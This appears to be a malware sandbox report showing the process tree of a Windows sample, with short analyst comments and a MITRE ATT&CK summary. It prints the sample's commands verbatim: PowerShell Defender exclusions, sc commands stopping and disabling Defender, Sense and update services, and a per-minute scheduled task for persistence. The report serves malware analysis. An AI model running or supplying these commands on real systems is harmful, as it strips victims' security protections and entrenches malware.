      AdvancedRun is the NirSoft launcher matched by the Nirsoft YARA rule; the sample drops it next to a test.bat and uses it to run the batch file under the account selected by /RunAs. The child below, started with /SpecialRun and the parent's PID 5100, is AdvancedRun relaunching itself.

        C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe
          "C:\Users\Admin\AppData\Local\Temp\8ba77dff-9026-4926-9458-42a1833160cf\AdvancedRun.exe" /SpecialRun 4101d8 5100
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 2756
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2896

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1376

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 4440

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force
      PID: 3616

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1080
    C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe"
      - UAC bypass
      - Checks computer location settings
      - Executes dropped EXE
      - Adds Run key to start application
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - System policy modification
      PID: 868
      The Startup-folder copy repeats the parent's whole routine (AdvancedRun, exclusions, self-injection), so every logon re-runs the Defender tampering.

        C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe
          "C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 1004

            C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3a8d1037-c218-4468-b049-38d039afce41\test.bat"
              - Suspicious use of WriteProcessMemory
              PID: 4984

                C:\Windows\system32\sc.exe
                  sc stop windefend
                  - Launches sc.exe
                  PID: 5452

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 5844

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 5884

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 5928

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" -Force
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 5996

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 6088

        C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout 1
          PID: 5808

            C:\Windows\SysWOW64\timeout.exe
              timeout 1
              - Delays execution with timeout.exe
              PID: 5752

        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe
          "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe"
          - Executes dropped EXE
          PID: 3324
          This is the child whose thread context 868 sets (SetThreadContext table), so the schtasks commands below come from the injected payload: it deletes and recreates a task named NYAN that launches the Startup-folder copy every minute.

            C:\Windows\SysWOW64\schtasks.exe
              schtasks /Delete /tn NYAN /F
              PID: 2852

            C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn NYAN /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe" /sc minute /mo 1
              - Creates scheduled task(s)
              PID: 5460

        C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 868 -s 1852
          - Program crash
          PID: 5488
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1360)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 320)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 552)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" -Force
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 2404)
    cmdline: "C:\Windows\System32\cmd.exe" /c timeout 1
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\timeout.exe (PID 5748)
      cmdline: timeout 1
      - Delays execution with timeout.exe
  C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe (PID 5432)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"
    - Checks computer location settings
    - Drops file in Windows directory
    C:\Windows\SysWOW64\schtasks.exe (PID 5464)
      cmdline: schtasks /Delete /tn NYAN /F
    C:\Windows\SysWOW64\schtasks.exe (PID 5864)
      cmdline: schtasks /create /tn NYAN /tr "C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe" /sc minute /mo 1
      - Creates scheduled task(s)
    C:\Windows\EdgeBrowser.exe (PID 3864)
      cmdline: "C:\Windows\EdgeBrowser.exe"
      - UAC bypass
      - Windows security bypass
      - Checks computer location settings
      - Executes dropped EXE
      - Windows security modification
      - Adds Run key to start application
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      - System policy modification
      C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe (PID 4676)
        cmdline: "C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1580)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3456)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2508)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4316)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1240)
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force
        - Suspicious use of AdjustPrivilegeToken
      C:\Windows\SysWOW64\cmd.exe (PID 6060)
        cmdline: "C:\Windows\System32\cmd.exe" /c timeout 1
        C:\Windows\SysWOW64\timeout.exe (PID 5752)
          cmdline: timeout 1
          - Delays execution with timeout.exe
      C:\Windows\EdgeBrowser.exe (PID 3460)
        cmdline: "C:\Windows\EdgeBrowser.exe"
        - Executes dropped EXE
        - Drops file in Windows directory
        - Suspicious use of AdjustPrivilegeToken
        C:\Windows\SysWOW64\schtasks.exe (PID 5632)
          cmdline: schtasks /Delete /tn NYAN /F
        C:\Windows\SysWOW64\schtasks.exe (PID 2972)
          cmdline: schtasks /create /tn NYAN /tr "C:\Windows\EdgeBrowser.exe" /sc minute /mo 1
          - Creates scheduled task(s)
      C:\Windows\SysWOW64\WerFault.exe (PID 1436)
        cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3864 -s 1756
        - Program crash
  C:\Windows\SysWOW64\WerFault.exe (PID 5836)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2320 -s 1756
    - Program crash
C:\Windows\SysWOW64\WerFault.exe (PID 1868)
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2320 -ip 2320
C:\Windows\SysWOW64\WerFault.exe (PID 440)
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 868 -ip 868
C:\Windows\system32\sc.exe (PID 884)
  cmdline: sc stop windefend
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 5804)
  cmdline: sc config SecurityHealthService start= disabled
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 1500)
  cmdline: sc stop WdiSystemHost
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 4160)
  cmdline: sc config InstallService Start= disabled
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 2268)
  cmdline: sc stop InstallService
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 1800)
  cmdline: sc config WdiSystemHost start= disabled
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 928)
  cmdline: sc config WdiServiceHost start= disabled
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 4736)
  cmdline: sc stop WdiServiceHost
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 3616)
  cmdline: sc config wscsvc start= disabled
  - Launches sc.exe
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\sc.exe (PID 2324)
  cmdline: sc stop wscsvc
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 3816)
  cmdline: sc config SDRSVC start= disabled
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 3688)
  cmdline: sc stop SDRSVC
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 4484)
  cmdline: sc stop SecurityHealthService
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 3508)
  cmdline: sc config WaasMedicSvc start= disabled
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 3860)
  cmdline: sc stop WaasMedicSvc
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 704)
  cmdline: sc config usosvc start= disabled
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 3364)
  cmdline: sc stop usosvc
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 3764)
  cmdline: sc config wuauserv start= disabled
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 3652)
  cmdline: sc stop wuauserv
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 1760)
  cmdline: sc config Sense start= disabled
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 4692)
  cmdline: sc stop Sense
  - Launches sc.exe
C:\Windows\system32\sc.exe (PID 2156)
  cmdline: sc config windefend start= disabled
  - Launches sc.exe
C:\Windows\system32\cmd.exe (PID 5960)
  cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e8a9de02-0594-4d3e-9afc-2e8d01ca4dd4\test.bat"
C:\Windows\System32\sihclient.exe (PID 5808)
  cmdline: C:\Windows\System32\sihclient.exe /cv M0nPrqn9l0uxnPFE5ym+WA.0.2
C:\Windows\SysWOW64\WerFault.exe (PID 4996)
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3864 -ip 3864
C:\Windows\EdgeBrowser.exe (PID 3652)
  cmdline: C:\Windows\EdgeBrowser.exe
  - UAC bypass
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - System policy modification
  C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\AdvancedRun.exe (PID 2716)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\cmd.exe (PID 4484)
      cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\008d5608-fb82-4b14-a4f4-16aeb5d00930\test.bat"
      C:\Windows\system32\sc.exe (PID 3196)
        cmdline: sc stop windefend
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 1912)
        cmdline: sc config windefend start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 2944)
        cmdline: sc stop Sense
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4736)
        cmdline: sc config Sense start= disabled
      C:\Windows\system32\sc.exe (PID 6052)
        cmdline: sc stop wuauserv
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4660)
        cmdline: sc config wuauserv start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4000)
        cmdline: sc stop usosvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4752)
        cmdline: sc config usosvc start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 2268)
        cmdline: sc stop WaasMedicSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4884)
        cmdline: sc config WaasMedicSvc start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 3744)
        cmdline: sc stop SecurityHealthService
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4160)
        cmdline: sc config SecurityHealthService start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4424)
        cmdline: sc stop SDRSVC
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 2428)
        cmdline: sc config SDRSVC start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 3108)
        cmdline: sc stop wscsvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 5960)
        cmdline: sc config wscsvc start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 5316)
        cmdline: sc stop WdiServiceHost
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4448)
        cmdline: sc config WdiServiceHost start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 2804)
        cmdline: sc stop WdiSystemHost
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4896)
        cmdline: sc config WdiSystemHost start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 1752)
        cmdline: sc stop InstallService
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 1212)
        cmdline: sc config InstallService Start= disabled
        - Launches sc.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5212)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5572)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 3016)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 6072)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 4972)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 6000)
    cmdline: "C:\Windows\System32\cmd.exe" /c timeout 1
    C:\Windows\SysWOW64\timeout.exe (PID 2128)
      cmdline: timeout 1
      - Delays execution with timeout.exe
  C:\Windows\EdgeBrowser.exe (PID 2776)
    cmdline: "C:\Windows\EdgeBrowser.exe"
    - Executes dropped EXE
  C:\Windows\EdgeBrowser.exe (PID 2896)
    cmdline: "C:\Windows\EdgeBrowser.exe"
    - Executes dropped EXE
    C:\Windows\SysWOW64\schtasks.exe (PID 5244)
      cmdline: schtasks /Delete /tn NYAN /F
    C:\Windows\SysWOW64\schtasks.exe (PID 812)
      cmdline: schtasks /create /tn NYAN /tr "C:\Windows\EdgeBrowser.exe" /sc minute /mo 1
      - Creates scheduled task(s)
  C:\Windows\SysWOW64\WerFault.exe (PID 5428)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3652 -s 908
    - Program crash
C:\Windows\SysWOW64\WerFault.exe (PID 380)
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3652 -ip 3652
C:\Windows\EdgeBrowser.exe (PID 4380)
  cmdline: C:\Windows\EdgeBrowser.exe
  - UAC bypass
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System policy modification
  C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\AdvancedRun.exe (PID 1376)
    cmdline: "C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\cmd.exe (PID 3848)
      cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2841dd81-cf01-489d-83c7-652a0936f2d0\test.bat"
      C:\Windows\system32\sc.exe (PID 3196)
        cmdline: sc stop windefend
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 2148)
        cmdline: sc config windefend start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 1424)
        cmdline: sc stop Sense
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 6052)
        cmdline: sc config Sense start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4660)
        cmdline: sc stop wuauserv
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 3712)
        cmdline: sc config wuauserv start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 756)
        cmdline: sc stop usosvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 3408)
        cmdline: sc config usosvc start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4884)
        cmdline: sc stop WaasMedicSvc
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 3744)
        cmdline: sc config WaasMedicSvc start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4160)
        cmdline: sc stop SecurityHealthService
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4424)
        cmdline: sc config SecurityHealthService start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 2428)
        cmdline: sc stop SDRSVC
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 5304)
        cmdline: sc config SDRSVC start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 3060)
        cmdline: sc stop wscsvc
      C:\Windows\system32\sc.exe (PID 4796)
        cmdline: sc config wscsvc start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 4492)
        cmdline: sc stop WdiServiceHost
      C:\Windows\system32\sc.exe (PID 564)
        cmdline: sc config WdiServiceHost start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 3512)
        cmdline: sc stop WdiSystemHost
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 1660)
        cmdline: sc config WdiSystemHost start= disabled
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 1212)
        cmdline: sc stop InstallService
        - Launches sc.exe
      C:\Windows\system32\sc.exe (PID 1364)
        cmdline: sc config InstallService Start= disabled
        - Launches sc.exe
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5300)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5408)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1504)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5700)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\EdgeBrowser.exe" -Force
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 5536)
    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe" -Force
  C:\Windows\SysWOW64\cmd.exe (PID 2376)
    cmdline: "C:\Windows\System32\cmd.exe" /c timeout 1
    C:\Windows\SysWOW64\timeout.exe (PID 3324)
      cmdline: timeout 1
      - Delays execution with timeout.exe
  C:\Windows\EdgeBrowser.exe (PID 5504)
    cmdline: "C:\Windows\EdgeBrowser.exe"
    - Executes dropped EXE
    C:\Windows\SysWOW64\schtasks.exe (PID 1580)
      cmdline: schtasks /Delete /tn NYAN /F
    C:\Windows\SysWOW64\schtasks.exe (PID 5492)
      cmdline: schtasks /create /tn NYAN /tr "C:\Windows\EdgeBrowser.exe" /sc minute /mo 1
      - Creates scheduled task(s)
  C:\Windows\SysWOW64\WerFault.exe (PID 2128)
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 1604
    - Program crash
C:\Windows\SysWOW64\WerFault.exe (PID 5716)
  cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4380 -ip 4380
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Scheduled Task/Job (1)
Privilege Escalation
- Abuse Elevation Control Mechanism (1)
  - Bypass User Account Control (1)
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Scheduled Task/Job (1)
Downloads